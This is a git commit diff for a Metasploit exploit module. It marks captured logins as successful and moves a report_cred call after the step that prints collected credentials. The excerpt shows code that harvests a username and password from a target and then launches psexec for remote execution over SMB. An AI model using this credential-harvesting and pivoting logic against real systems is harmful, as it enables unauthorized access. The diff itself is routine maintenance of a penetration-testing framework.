Change to Metasploit::Model::Login::Status::SUCCESSFUL

bug/bundler_fix
wchen-r7 2015-06-18 23:44:45 -05:00
parent 78e4677bb1
commit 7e91121afc
1 changed files with 10 additions and 10 deletions

View File

@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
status: Metasploit::Model::Login::Status::SUCCESSFUL,
}.merge(service_data)
create_credential_login(login_data)
@ -130,15 +130,6 @@ class Metasploit3 < Msf::Exploit::Remote
pass = resp[pass_index+1].gsub(/\"/, "")
end
# report the auth
report_cred(
ip: datastore['RHOST'],
port: 445,
service_name: 'smb',
user: user,
password: pass
)
srvc = {
:host => datastore['RHOST'],
:port => datastore['RPORT'],
@ -154,6 +145,15 @@ class Metasploit3 < Msf::Exploit::Remote
print_good("Collected credentials User: '#{user}' Password: '#{pass}'")
# report the auth
report_cred(
ip: datastore['RHOST'],
port: 445,
service_name: 'smb',
user: user,
password: pass
)
# try psexec on the remote host
psexec = framework.exploits.create("windows/smb/psexec")
psexec.register_parent(self)